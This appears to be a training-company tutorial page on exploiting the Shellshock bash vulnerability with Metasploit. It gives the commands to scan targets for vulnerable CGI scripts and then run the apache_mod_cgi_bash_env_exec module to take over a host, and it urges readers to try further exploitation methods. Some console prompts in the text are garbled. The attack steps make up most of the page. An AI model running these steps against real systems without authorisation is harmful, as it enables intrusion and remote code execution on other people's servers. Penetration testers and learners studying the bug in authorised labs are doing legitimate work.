TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.
Shellshock was another one of those exploits that was very impactful across the IT industry. Some said it was Heartbleed 2.0.
There are already many Metasploit modules evailable for Shellshock including:
> auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
> auxiliary/server/dhclient_bash_env.rb
> exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
> exploits/osx/local/vmware_bash_function_root.rb
Let's try one...Start by launching Metasploit. Remember to start the database service!
# service postgresql start
/opt/metasploit/app# ./msfconsole
Once launched, use the following commands to scan for vulnerable systems:
msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set RHOSTS <TARGETS>
RHOSTS=> <TARGETS>
msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi
msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > run
Once a vulnerable system is discovered, it can be exploited using the following module:
msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
RHOST=> 192.168.1.1
msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi
msf exploit(apache_mod_cgi_bash_env_exec) > run
There are many ways to expoit this vulnerability. Try out a few different ways and see for your self why it is so dangerous.
SHELLSHOCK
Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).
